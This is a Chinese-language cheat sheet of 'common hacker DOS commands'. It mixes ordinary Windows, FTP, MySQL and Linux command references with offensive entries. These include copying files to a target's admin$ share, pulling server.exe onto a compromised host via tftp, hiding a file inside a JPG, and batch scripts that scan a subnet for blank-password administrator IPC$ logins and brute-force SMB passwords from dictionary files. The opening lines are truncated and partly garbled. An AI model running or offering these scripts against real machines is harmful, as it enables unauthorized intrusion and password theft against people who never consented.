fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中,"> "和"> >" 是
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注:
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方 admini$共享下的
tftp -i 自己 IP(用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将“IP”的
mem 查看 cpu 使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属
性;用+则是添加为某属性
dir 查看文件,参数:/Q 显示文件及目录属系统哪个用户,/T:C 显示文件创建时间,/T:A 显
示文件上次被访问时间,/T:W 上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必
输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符 p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见 if 命令及变量)
goto 标签 将 cmd.exe 导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,
例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见 call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
echo on 或 off 打开或关闭 echo,仅用 echo 不加参数则显示当前 echo 设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到 pass.txt 文件中
findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello
find 文件名 查找某文件
title 标题名字 更改 CMD 窗口标题名字
color 颜色值 设置 cmd 控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、
5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、
F=亮白
prompt 名称 更改 cmd.exe 的显示的命令提示符(把 C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
ver 在 DOS 窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为 DOS 提供的锁定命令(编辑命令行,重新调用 win2k 命令,并创建
宏)。如:锁定 dir 命令:doskey dir=entsky (不能用 doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘 D 并显示状态报告;加参数/f 并修复磁盘上的错误 tlntadmn telnt 服务 admn,键入 tlntadmn 选择 3,再选择 8,就可以更改 telnet 服务默认端口 23
为其它任何端口
exit 退出 cmd.exe 程序或目前,用参数/B 则是退出当前批处理脚本而不是 cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个 win2K 命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明
见 cmd /?
regedit /s 注册表文件名 导入注册表;参数/S 指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对 NTFS 格式时。参数:
/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户
名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),
F 完全控制;例:cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
IIS 服务命令:
iisreset /reboot 重启 win2k 计算机(但有提示系统将重启信息出现)
iisreset /start 或 stop 启动(停止)所有 Internet 服务
iisreset /restart 停止然后重新启动所有 Internet 服务
iisreset /status 显示所有 Internet 服务状态
iisreset /enable 或 disable 在本地系统上启用(禁用)Internet 服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动 Internet 服务时,若发生错误将重新开机
iisreset /noforce 若无法停止 Internet 服务,将不会强制终止 Internet 服务
iisreset /timeout Val 在到达逾时间(秒)时,仍未停止 Internet 服务,若指定/rebootonerror
参数,则电脑将会重新开机。预设值为重新启动 20 秒,停止 60 秒,重新开机 0 秒。
FTP 命令: (后面有详细说明内容)
ftp 的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制 ftp 的自动登录,即不使用.netrc 文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机 FTP 进程,并退出 FTP 管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就
将结果写至本地文件
ascii 设定以 ASCII 方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的 ftp 会话(与 open 对应)
open host[port] 建立指定 ftp 服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前 FTP 的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的 HOME 目录
chmod 改变远端主机的文件权限
case 当为 ON 时,用 MGET 命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
在本地机中执行交互 shell,exit 回到 ftp 环境,如!ls*.zip
MYSQL 命令:
mysql -h 主机地址 -u 用户名 -p 密码 连接 MYSQL;如果刚安装好 MYSQL,超级用户 root
是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u 与 root 可以不用加空格,其它也一样)
exit 退出 MYSQL
mysqladmin -u 用户名 -p 旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和
上面不同,下面的因为是 MYSQL 环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql 和 test。mysql 库很重要它
里面有 MYSQL 的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school>school.bbb 备份数据库:(命令在 DOS 的\\mysql\\bin 目录下执行);注释:将数据库 school 备份到 school.bbb 文件,school.bbb 是一个文本文件,文件名任取,打
开看看你会有新发现。
win2003 系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围 0~180 秒之间,
/A 取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的 pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的 pid,可用 tasklist 命令获得各进程的 pid,/IM 要终止的进程的
进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的 dll 文件,/SVC 显示出每个进程对应的服务,无参数时
就只列出当前的进程。
Linux 系统下基本命令: 要区分大小写
uname 显示版本信息(同 win2K 的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同 win2K 的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意 cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往 abc.txt 文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
DOS 黑客常用命令大全
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及 Login 时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的 Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译 C 语言写的文件
su 权限转换为指定使用者 telnet IP telnet 连接对方主机(同 win2K),当出现 bash$时就说明连接成功。
ftp ftp 连接上某服务器(同 win2K)
附:批处理命令与变量
1:for 命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一
字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变
量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9 共 10 个,其中%0 默认给批处理文件名使用,%1 默认
为使用此批处理时输入的的第一个值,同理:%2—%9 指输入的第 2-9 个值;例:net use
$">\\ip\ipc$ pass /user:user 中 ip 为%1,pass 为%2 ,user 为%3
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”
第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从 1 到 254;“(1 -1 254)”
说明:即从 254 到 1}
command:指定对第个文件执行的命令,如:net use 命令;如要执行多个命令时,命令这间
加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行 command
参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)
为文件时,如(d:\pass.txt)时}。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator |
find "命令成功完成" >>test.txt
存为 test.bat 说明:对指定的一个 C 类网段的 254 个 IP 依次试建立 administrator 密码为空的
IPC$连接,如果成功就把该 IP 存在 test.txt 中。
/L 指用增量形式(即从 1-254 或 254-1);输入的 IP 前面三位:*.*.*为批处理默认的 %1;%%G
为变量(ip 的最后一位);& 用来隔开 echo 和 net use 这二个命令;| 指建立了 ipc$后,在结
果中用 find 查看是否有"命令成功完成"信息;%1.%%G 为完整的 IP 地址;(1 1 254) 指起始
值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个 IP 后,用字典文件 d:\pass.dic 来暴解 d:\user.dic 中的用户密码,
直到文件中值取完为止。%%i 为用户名;%1 为输入的 IP 地址(默认)。